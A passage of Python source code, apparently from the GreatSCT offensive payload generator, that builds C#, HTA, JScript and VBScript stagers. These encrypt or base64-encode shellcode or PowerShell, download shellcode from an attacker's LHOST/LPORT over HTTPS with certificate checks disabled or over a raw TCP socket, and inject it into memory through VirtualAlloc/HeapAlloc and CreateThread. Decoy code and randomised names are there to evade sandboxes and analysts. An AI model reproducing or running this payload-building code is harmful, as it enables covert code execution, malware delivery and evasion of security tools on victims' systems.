'r') as original: data = original.read() with open("/tmp/greatsct.js", 'w') as modified: modified.write( "<script language=\"JScript\">\n\nvar {0} = \"{1}\";\n\n". 
format(x86, Shellcode) + data + "\nwindow.close();\n</script>") with open("/tmp/greatsct.js", "r") as js: payload = js.read() if self.required_options["ENCRYPTION"][0].lower() != "x": encrypted_payload = encryption.rc4(key, payload) encrypted_payload = base64.standard_b64encode( bytes(encrypted_payload, "latin-1")).decode("ascii") # rc4 = bypass_helpers.randomString() # jskey = bypass_helpers.randomString() # string = bypass_helpers.randomString() # s = bypass_helpers.randomString() # j = bypass_helpers.randomString() # x = bypass_helpers.randomString() # TODO obfuscate source_code = "<script language = \"javascript\">" # Based on code from https://github.com/mdsecactivebreach/SharpShooter source_code += """rc4 = function(key, str) { var s = [], j = 0, x, res = ''; for (var i = 0; i < 256; i++) { s[i] = i; } for (i = 0; i < 256; i++) { j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; x = s[i]; s[i] = s[j]; s[j] = x; } i = 0; j = 0; for (var y = 0; y < str.length; y++) { i = (i + 1) % 256; j = (j + s[i]) % 256; x = s[i]; s[i] = s[j]; s[j] = x; res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); } return res; } decodeBase64 = function(s) { var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length; var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; for(i=0;i<64;i++){e[A.charAt(i)]=i;} for(x=0;x<L;x++){ c=e[s.charAt(x)];b=(b<<6)+c;l+=6; while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));} } return r; };""" source_code += '\nvar b64block = "{0}";'.format( encrypted_payload) source_code += "\nvar decoded = decodeBase64(b64block);" source_code += "\nvar plain = rc4(\"{0}\", decoded);".format( key) source_code += "\neval(plain);" source_code += "\n</script>" else: source_code = payload elif self.required_options["SCRIPT_TYPE"][0].lower() == "vbscript": # do stuff with open("/tmp/migrate.vbs", "w") as ff: ff.write("o.Print {0}".format(x86)) os.system( "mcs -platform:x86 -target:library -sdk:2 {0} 
-out:/tmp/dotnettojscript.dll" .format("/tmp/hta_source.cs")) os.system( "WINEPREFIX=/root/.greatsct wine /usr/share/greatsct/DotNetToJScript.exe /tmp/dotnettojscript.dll -ver auto -l vbscript -c HelloWorld -o {0} -s /tmp/migrate.vbs" .format("/tmp/greatsct.vbs")) with open("/tmp/greatsct.vbs", 'r') as original: data = original.read() with open("/tmp/greatsct.vbs", 'w') as modified: modified.write( "<script language=\"VBScript\">\n\n\nDim {0} : {0} = \"{1}\"\n\n" .format(x86, Shellcode) + data + "\nSelf.Close()\n</script>") with open("/tmp/greatsct.vbs", "r") as vbs: payload = vbs.read() if self.required_options["ENCRYPTION"][0].lower() != "x": encrypted_payload = encryption.rc4(key, payload) encrypted_payload = base64.standard_b64encode( bytes(encrypted_payload, "latin-1")).decode("ascii") # Based on code from https://github.com/mdsecactivebreach/SharpShooter # TODO: obfuscate source_code = "" source_code += """rc4 = function(key, str) { var s = [], j = 0, x, res = ''; for (var i = 0; i < 256; i++) { s[i] = i; } for (i = 0; i < 256; i++) { j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; x = s[i]; s[i] = s[j]; s[j] = x; } i = 0; j = 0; for (var y = 0; y < str.length; y++) { i = (i + 1) % 256; j = (j + s[i]) % 256; x = s[i]; s[i] = s[j]; s[j] = x; res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); } return res; } decodeBase64 = function(s) { var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length; var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; for(i=0;i<64;i++){e[A.charAt(i)]=i;} for(x=0;x<L;x++){ c=e[s.charAt(x)];b=(b<<6)+c;l+=6; while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));} } return r; };""" source_code += '\nvar b64block = "{0}";'.format( encrypted_payload) source_code += "\nvar decoded = decodeBase64(b64block);" source_code += "\nvar plain = rc4(\"{0}\", decoded);".format( key) source_code += "\n</script>" source_code += "\n<script language = \"vbscript\">" source_code += "\nExecute 
plain" source_code += "\nself.close" source_code += "</script>" source_code = "<script language = \"javascript\">\n" + source_code else: source_code = payload else: print("Script type not supported") self.payload_source_code = source_code return
def generate(self): with open(self.required_options["SCRIPT"][0], "r") as f: the_script = f.read() if self.required_options["FUNCTION"][0].lower() != "x": # Append FUNCTION to end of script the_script += "\n{0}".format(self.required_options["FUNCTION"][0]) FunctionName = self.required_options["FUNCTION"][0] if self.required_options["OBFUSCATION"][0].lower() != "x": if self.required_options["OBFUSCATION"][0].lower() == "binary": the_script = invoke_obfuscation.binaryEncode(the_script) elif self.required_options["OBFUSCATION"][0].lower() == "ascii": the_script = invoke_obfuscation.asciiEncode(the_script) else: the_script = invoke_obfuscation.binaryEncode(the_script) # randomize all our variable names, yo' className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() namespace = bypass_helpers.randomString() key = bypass_helpers.randomString() execName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Threading; using System.EnterpriseServices; using System.Runtime.InteropServices; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n" payload_code += "namespace {0}\n {{".format(namespace) payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format( className) # placeholder for legitimate C# program # lets add a message box to throw offf sandbox heuristics and analysts :) payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format( className) payload_code += "\n\t\t[ComRegisterFunction]" payload_code += "\n\t\tpublic static void RegisterClass ( string {0} 
)\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format( classNameTwo, execName) payload_code += "\n[ComUnregisterFunction]" payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameTwo, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo) payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 encodedScript = bypass_helpers.randomString() encodedScriptContents = base64.b64encode(bytes( the_script, 'latin-1')).decode('ascii') powershellCmd = bypass_helpers.randomString() data = bypass_helpers.randomString() command = bypass_helpers.randomString() RunPSCommand = bypass_helpers.randomString() cmd = bypass_helpers.randomString() runspace = bypass_helpers.randomString() scriptInvoker = bypass_helpers.randomString() pipeline = bypass_helpers.randomString() results = bypass_helpers.randomString() stringBuilder = bypass_helpers.randomString() obj = bypass_helpers.randomString() RunPSFile = bypass_helpers.randomString() script = bypass_helpers.randomString() ps = bypass_helpers.randomString() e = bypass_helpers.randomString() payload_code += """string {0} = "{1}"; string {2} = ""; byte[] {3} = Convert.FromBase64String({0}); string {4} = Encoding.ASCII.GetString({3}); {2} = {4}; try {{ Console.Write({5}({2})); }} catch (Exception {6}) {{ Console.Write({6}.Message); }}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code += """}} public static string {0}(string {1}) {{ Runspace {2} = RunspaceFactory.CreateRunspace(); {2}.Open(); RunspaceInvoke {3} = new RunspaceInvoke({2}); Pipeline {4} = {2}.CreatePipeline(); {4}.Commands.AddScript({1}); 
{4}.Commands.Add("Out-String"); Collection<PSObject> {5} = {4}.Invoke(); {2}.Close(); StringBuilder {6} = new StringBuilder(); foreach (PSObject {7} in {5}) {{ {6}.Append({7}); }} return {6}.ToString().Trim(); }} public static void {8}(string {9}) {{ PowerShell {10} = PowerShell.Create(); {10}.AddScript({9}).Invoke(); }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps) payload_code += "\n}" * 2 self.payload_source_code = payload_code return
def generate(self): # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] # installutil random class variables className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() classNameThree = bypass_helpers.randomString() execName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n" payload_code += "\tpublic class {0} {{\n".format(className) payload_code += "\t\tpublic static void Main()\n\t\t{\n" # lets add a message box to throw offf sandbox heuristics and analysts :) # there is no decryption routine, troll.level = 9000 # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter. 
payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n" payload_code += "\t\t}\n\t}\n\n" payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n" payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format( classNameTwo) payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format( savedStateName) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameThree, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) # code for the randomString() function randomStringName = bypass_helpers.randomString() bufferName = bypass_helpers.randomString() charsName = 
bypass_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # logic to turn off certificate validation validateServerCertficateName = bypass_helpers.randomString() payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % ( validateServerCertficateName) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = bypass_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = bypass_helpers.randomString() baseStringName = bypass_helpers.randomString() randCharsName = bypass_helpers.randomString() urlName = bypass_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} 
return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = bypass_helpers.randomString() strName = bypass_helpers.randomString() webClientName = bypass_helpers.randomString() sName = bypass_helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % ( validateServerCertficateName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = bypass_helpers.randomString() sName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code 
+= " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything randomName = bypass_helpers.randomString() num_tabs_required = 0 payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);\n" % (injectName, sName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 encode the shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) # randomize all our variable names, yo' className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() classNameThree = bypass_helpers.randomString() execName = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() messWithAnalystName = bypass_helpers.randomString() shellcodeName = bypass_helpers.randomString() rand_bool = bypass_helpers.randomString() random_out = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n" payload_code += "\tpublic class {0} {{\n".format(className) payload_code += "\t\tpublic static void Main()\n\t\t{\n" # lets add a message box to throw offf sandbox heuristics and analysts :) # there is no decryption routine, troll.level = 9000 # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter. 
payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n" payload_code += "\t\t}\n\t}\n\n" payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n" payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format( classNameTwo) payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format( savedStateName) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameThree, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern IntPtr VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] public static extern bool VirtualProtect(IntPtr %s, uint %s, uint %s, out uint %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, IntPtr %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11], r[12], r[13], r[14], r[15]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += 
"\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % ( shellcodeName, Shellcode) payload_code += '\t' * num_tabs_required + "IntPtr %s = VirtualAlloc(0, (UInt32)%s.Length, 0x3000, 0x04);\n" % ( funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "uint %s;\n" % ( random_out) payload_code += '\t' * num_tabs_required + "bool %s = VirtualProtect(%s, (uint)0x1000, (uint)0x20, out %s);\n" % ( rand_bool, funcAddrName, random_out) payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = bypass_helpers.randomString() rand_ptr = bypass_helpers.randomString() rand_var = bypass_helpers.randomString() payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % ( shellcodeName, Shellcode) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, shellcodeName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, shellcodeName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, shellcodeName, shellcodeName) payload_code += '\t' * 
num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self):
    """Build the C# source for an InstallUtil-hosted stager and store it on ``self``.

    Assembles ``self.payload_source_code`` from string fragments, in order:

    * a ``Main`` that only loops over ``MessageBox.Show`` (a decoy; see the comment below);
    * an ``Installer`` subclass whose ``Uninstall`` override calls the real entry point;
    * ``kernel32`` P/Invoke declarations selected by ``INJECT_METHOD`` (``virtual`` or ``heap``);
    * a receive function that connects to ``LHOST``/``LPORT``, reads a 4-byte length prefix,
      then that many bytes into an offset buffer, and writes the socket handle into it;
    * an inject function that copies the buffer into executable memory and runs it on a new thread;
    * the entry point, prefixed with whatever ``gamemaker.senecas_games`` returns.

    Reads ``self.required_options["INJECT_METHOD"]``, ``["LHOST"]`` and ``["LPORT"]``.
    Returns ``None``; the result is written to ``self.payload_source_code``.

    NOTE(review): for any ``INJECT_METHOD`` other than ``virtual``/``heap`` neither the
    P/Invoke block nor the inject function is emitted, but the entry point still calls the
    inject function, so the generated C# would not compile. ``LHOST``/``LPORT`` are pasted
    into a C# string literal unescaped; a value containing ``"`` or ``\\`` breaks the output.
    """
    # get random variables for the API imports
    # (the "virtual" branch uses r[0..11]; r[12..15] are unused here)
    r = [bypass_helpers.randomString() for x in range(16)]
    y = [bypass_helpers.randomString() for x in range(17)]
    # installutil random class variables
    getDataName = helpers.randomString()
    className = bypass_helpers.randomString()
    classNameTwo = bypass_helpers.randomString()
    classNameThree = bypass_helpers.randomString()
    execName = bypass_helpers.randomString()
    savedStateName = bypass_helpers.randomString()
    # required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n"
    payload_code += "\tpublic class {0} {{\n".format(className)
    payload_code += "\t\tpublic static void Main()\n\t\t{\n"
    # lets add a message box to throw off sandbox heuristics and analysts :)
    # there is no decryption routine, troll.level = 9000
    # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter.
    # NOTE(review): this line is not passed through .format(), so the doubled braces reach
    # the C# source verbatim as a nested block (harmless, but inconsistent with the lines around it).
    # Main is a decoy: reviewing Main alone says nothing about what the assembly does; the
    # real entry point is the Installer.Uninstall override emitted below.
    payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
    payload_code += "\t\t}\n\t}\n\n"
    # RunInstaller(true) + an Uninstall override is what makes InstallUtil run the code
    payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
    payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(classNameTwo)
    payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(savedStateName)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameThree, execName)
    # third class holds the P/Invoke declarations, the receive/inject helpers and the entry point
    payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # parameter names are randomised (r[...]); the declarations themselves are fixed
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        # note: unlike the "virtual" block this one has no trailing "\n" before the next fragment
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])
    # identifiers for the receive function (helpers.randomString here, bypass_helpers elsewhere)
    hostName = helpers.randomString()
    portName = helpers.randomString()
    ipName = helpers.randomString()
    sockName = helpers.randomString()
    length_rawName = helpers.randomString()
    lengthName = helpers.randomString()
    sName = helpers.randomString()
    total_bytesName = helpers.randomString()
    handleName = helpers.randomString()
    # receive function: connect, read a 4-byte little-endian length, then the body
    payload_code += "static byte[] %s(string %s, int %s) {\n" % (getDataName, hostName, portName)
    payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (ipName, hostName, portName)
    payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (sockName)
    # a failed connect returns null; the inject function checks for null before doing anything
    payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
    payload_code += " catch { return null;}\n"
    payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
    # NOTE(review): the return value of this Receive is not checked; a short read yields a wrong length
    payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName)
    payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (lengthName, length_rawName)
    # body is stored at offset 5; the first 5 bytes are filled in after the loop
    payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName)
    payload_code += " int %s = 0;\n" % (total_bytesName)
    payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
    payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName)
    # byte 0 is set to 0xBF and bytes 1..4 hold the socket handle
    payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (handleName, sockName)
    payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (handleName, sName, sName)
    payload_code += " return %s;}\n" % (sName)
    # code for the inject() function to inject shellcode
    injectName = bypass_helpers.randomString()
    sName = bypass_helpers.randomString()  # rebound: now the inject function's parameter name
    funcAddrName = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
